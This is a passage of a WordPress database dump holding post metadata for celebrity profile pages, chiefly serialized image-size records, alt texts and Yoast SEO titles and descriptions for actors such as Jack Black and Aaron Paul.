lack-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:22:\"jack-black-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:22:\"jack-black-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:22:\"jack-black-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:22:\"jack-black-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:22:\"jack-black-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:22:\"jack-black-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:22:\"jack-black-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:22:\"jack-black-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:22:\"jack-black-534x427.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:427;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:22:\"jack-black-640x385.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:22:\"jack-black-630x420.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1526,232,'_wp_attachment_image_alt','Jack Black'),(1527,231,'_thumbnail_id','232'),(1528,231,'_vc_post_settings','a:2:{s:7:\"vc_grid\";a:0:{}s:10:\"vc_grid_id\";a:0:{}}'),(1529,231,'slide_template',''),(1530,231,'_yoast_wpseo_focuskw','Jack Black'),(1531,231,'_yoast_wpseo_title','Jack Black'),(1532,231,'_yoast_wpseo_metadesc','What makes Jack Black one of the finest actors in Hollywood? Find out interesting facts about this comedian whose films have always been a blockbuster in theaters.'),(1533,231,'_yoast_wpseo_linkdex','83'),(1534,231,'post_views_count','378'),(1535,233,'_edit_lock','1444832807:6'),(1536,233,'_edit_last','6'),(1537,233,'_vc_post_settings','a:2:{s:7:\"vc_grid\";a:0:{}s:10:\"vc_grid_id\";a:0:{}}'),(1538,233,'slide_template',''),(1539,233,'_yoast_wpseo_focuskw','Melissa Mccarthy'),(1540,233,'_yoast_wpseo_title','Melissa McCarthy'),(1541,233,'_yoast_wpseo_metadesc','Who is Melissa McCarthy, and what are her accomplishments? Discover more facts about McCarthy including her professional and personal life as presented in this post.'),(1542,233,'_yoast_wpseo_linkdex','83'),(1543,233,'post_views_count','362'),(1544,234,'_wp_attached_file','2015/08/Melissa-McCarthy.jpg'),(1545,234,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:573;s:4:\"file\";s:28:\"2015/08/Melissa-McCarthy.jpg\";s:5:\"sizes\";a:16:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"Melissa-McCarthy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"Melissa-McCarthy-300x269.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:269;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:26:\"Melissa-McCarthy-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:27:\"Melissa-McCarthy-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:28:\"Melissa-McCarthy-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:28:\"Melissa-McCarthy-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:28:\"Melissa-McCarthy-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:28:\"Melissa-McCarthy-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:28:\"Melissa-McCarthy-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:28:\"Melissa-McCarthy-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:28:\"Melissa-McCarthy-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:28:\"Melissa-McCarthy-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:28:\"Melissa-McCarthy-534x462.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:28:\"Melissa-McCarthy-640x385.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:28:\"Melissa-McCarthy-640x486.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:28:\"Melissa-McCarthy-469x420.jpg\";s:5:\"width\";i:469;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1546,233,'_thumbnail_id','234'),(1547,234,'_wp_attachment_image_alt','Melissa McCarthy'),(1548,222,'_wp_attachment_image_alt','Edward Norton'),(1549,212,'_thumbnail_id','222'),(1551,212,'_yoast_wpseo_focuskw','Edward Norton'),(1552,212,'_yoast_wpseo_title','Edward Norton'),(1553,212,'_yoast_wpseo_metadesc','Edward Norton is one of the greatest actors of today, and is just a great guy. Learn more about his acting and activist career and his personal life.'),(1554,212,'_yoast_wpseo_linkdex','79'),(1555,235,'_wp_attached_file','2015/08/Gerald-McRaney.jpg'),(1556,235,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:625;s:6:\"height\";i:608;s:4:\"file\";s:26:\"2015/08/Gerald-McRaney.jpg\";s:5:\"sizes\";a:17:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"Gerald-McRaney-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"Gerald-McRaney-300x292.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:292;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:24:\"Gerald-McRaney-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:25:\"Gerald-McRaney-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:26:\"Gerald-McRaney-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:26:\"Gerald-McRaney-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:26:\"Gerald-McRaney-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:26:\"Gerald-McRaney-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:26:\"Gerald-McRaney-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:26:\"Gerald-McRaney-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:26:\"Gerald-McRaney-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:26:\"Gerald-McRaney-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:26:\"Gerald-McRaney-534x462.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:26:\"Gerald-McRaney-625x385.jpg\";s:5:\"width\";i:625;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:26:\"Gerald-McRaney-625x486.jpg\";s:5:\"width\";i:625;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"td_1068x580\";a:4:{s:4:\"file\";s:26:\"Gerald-McRaney-625x580.jpg\";s:5:\"width\";i:625;s:6:\"height\";i:580;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:26:\"Gerald-McRaney-432x420.jpg\";s:5:\"width\";i:432;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1557,235,'_wp_attachment_image_alt','Gerald McRaney'),(1558,213,'_thumbnail_id','235'),(1560,213,'_yoast_wpseo_focuskw','Gerald McRaney'),(1561,213,'_yoast_wpseo_title','Gerald McRaney'),(1562,213,'_yoast_wpseo_metadesc','Gerald McRaney is a well known actor. Learn more about his career over the years as well as his personal life, and what he is most known for today.'),(1563,213,'_yoast_wpseo_linkdex','78'),(1564,223,'_wp_attachment_image_alt','Amy Adams'),(1565,214,'_thumbnail_id','223'),(1567,214,'_yoast_wpseo_focuskw','Amy Adams'),(1568,214,'_yoast_wpseo_title','Amy Adams'),(1569,214,'_yoast_wpseo_metadesc','Amy Adams is one of the most stellar and successful actresses today. Learn more about her personal life as well as the work that she is known for.'),(1570,214,'_yoast_wpseo_linkdex','80'),(1571,224,'_wp_attachment_image_alt','Hayden Panettiere'),(1572,215,'_thumbnail_id','224'),(1573,215,'_yoast_wpseo_focuskw','Hayden Panettiere'),(1574,215,'_yoast_wpseo_title','Hayden Panettiere'),(1575,215,'_yoast_wpseo_metadesc','Hayden Panettiere is one of the great young actresses of today. Learn more about her personal life, her career accomplishments, and what she is known for.'),(1576,215,'_yoast_wpseo_linkdex','83'),(1577,236,'_edit_lock','1497974857:2'),(1578,236,'_edit_last','2'),(1579,237,'_wp_attached_file','2015/08/Rupert-Grint.jpg'),(1580,237,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:480;s:4:\"file\";s:24:\"2015/08/Rupert-Grint.jpg\";s:5:\"sizes\";a:15:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"Rupert-Grint-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"Rupert-Grint-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:22:\"Rupert-Grint-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:23:\"Rupert-Grint-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:24:\"Rupert-Grint-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:24:\"Rupert-Grint-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:24:\"Rupert-Grint-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:24:\"Rupert-Grint-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:24:\"Rupert-Grint-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:24:\"Rupert-Grint-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:24:\"Rupert-Grint-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:24:\"Rupert-Grint-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:24:\"Rupert-Grint-534x462.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:24:\"Rupert-Grint-640x385.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:24:\"Rupert-Grint-560x420.jpg\";s:5:\"width\";i:560;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1581,237,'_wp_attachment_image_alt','Rupert Grint'),(1582,236,'_thumbnail_id','237'),(1583,236,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(1584,236,'slide_template','default'),(1585,236,'_yoast_wpseo_focuskw','Rupert Grint'),(1586,236,'_yoast_wpseo_title','Rupert Grint'),(1587,236,'_yoast_wpseo_metadesc','Everybody knows Rupert Grint as Ron Weasley from Harry Potter films, yet there is more to this actor than that. Read this post about Grint and learn more about his life.'),(1588,236,'_yoast_wpseo_linkdex','81'),(1589,236,'post_views_count','323'),(1590,238,'_edit_lock','1444832928:6'),(1591,238,'_edit_last','6'),(1592,239,'_wp_attached_file','2015/08/Tim-Burton.jpg'),(1593,239,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:565;s:4:\"file\";s:22:\"2015/08/Tim-Burton.jpg\";s:5:\"sizes\";a:18:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"Tim-Burton-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"Tim-Burton-300x212.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"Tim-Burton-768x542.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:542;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:20:\"Tim-Burton-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:21:\"Tim-Burton-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:22:\"Tim-Burton-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:22:\"Tim-Burton-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:22:\"Tim-Burton-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:22:\"Tim-Burton-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:22:\"Tim-Burton-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:22:\"Tim-Burton-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:22:\"Tim-Burton-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:22:\"Tim-Burton-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:22:\"Tim-Burton-534x462.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_696x0\";a:4:{s:4:\"file\";s:22:\"Tim-Burton-696x492.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:492;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:22:\"Tim-Burton-696x385.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:22:\"Tim-Burton-741x486.jpg\";s:5:\"width\";i:741;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:22:\"Tim-Burton-595x420.jpg\";s:5:\"width\";i:595;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1594,239,'_wp_attachment_image_alt','Tim Burton'),(1595,238,'_thumbnail_id','239'),(1596,238,'_vc_post_settings','a:2:{s:7:\"vc_grid\";a:0:{}s:10:\"vc_grid_id\";a:0:{}}'),(1597,238,'slide_template','default'),(1598,238,'_yoast_wpseo_focuskw','Tim Burton'),(1599,238,'_yoast_wpseo_title','Tim Burton'),(1600,238,'_yoast_wpseo_metadesc','Learn more about Tim Burton and his exceptional skill as a director, screenwriter and producer. Check out this post and discover interesting facts about this great man.'),(1601,238,'_yoast_wpseo_linkdex','83'),(1602,238,'post_views_count','270'),(1603,240,'_edit_lock','1444832634:6'),(1604,241,'_edit_lock','1444832612:6'),(1605,240,'_edit_last','6'),(1606,241,'_edit_last','6'),(1607,240,'post_views_count','254'),(1608,241,'post_views_count','402'),(1609,242,'_wp_attached_file','2015/08/Aaron-Paul.jpg'),(1610,242,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:427;s:4:\"file\";s:22:\"2015/08/Aaron-Paul.jpg\";s:5:\"sizes\";a:15:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"Aaron-Paul-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"Aaron-Paul-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:20:\"Aaron-Paul-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:21:\"Aaron-Paul-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:22:\"Aaron-Paul-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:22:\"Aaron-Paul-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:22:\"Aaron-Paul-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:22:\"Aaron-Paul-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:22:\"Aaron-Paul-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:22:\"Aaron-Paul-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:22:\"Aaron-Paul-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:22:\"Aaron-Paul-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:22:\"Aaron-Paul-534x427.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:427;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:22:\"Aaron-Paul-640x385.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:22:\"Aaron-Paul-630x420.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1611,242,'_wp_attachment_image_alt','Aaron Paul'),(1612,240,'_thumbnail_id','242'),(1613,240,'_vc_post_settings','a:2:{s:7:\"vc_grid\";a:0:{}s:10:\"vc_grid_id\";a:0:{}}'),(1614,240,'slide_template',''),(1615,240,'_yoast_wpseo_focuskw','Aaron Paul'),(1616,240,'_yoast_wpseo_title','Aaron Paul'),(1617,240,'_yoast_wpseo_metadesc','Discover fascinating information about the life and career of Aaron Paul. This gifted actor is truly a genius as evident in his accomplishments throughout the years.'),(1618,240,'_yoast_wpseo_linkdex','84'),(1619,243,'_wp_attached_file','2015/08/Debbie-Gibson.jpg'),(1620,243,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:677;s:6:\"height\";i:725;s:4:\"file\";s:25:\"2015/08/Debbie-Gibson.jpg\";s:5:\"sizes\";a:17:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"Debbie-Gibson-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"Debbie-Gibson-280x300.jpg\";s:5:\"width\";i:280;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:23:\"Debbie-Gibson-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:24:\"Debbie-Gibson-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:25:\"Debbie-Gibson-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s: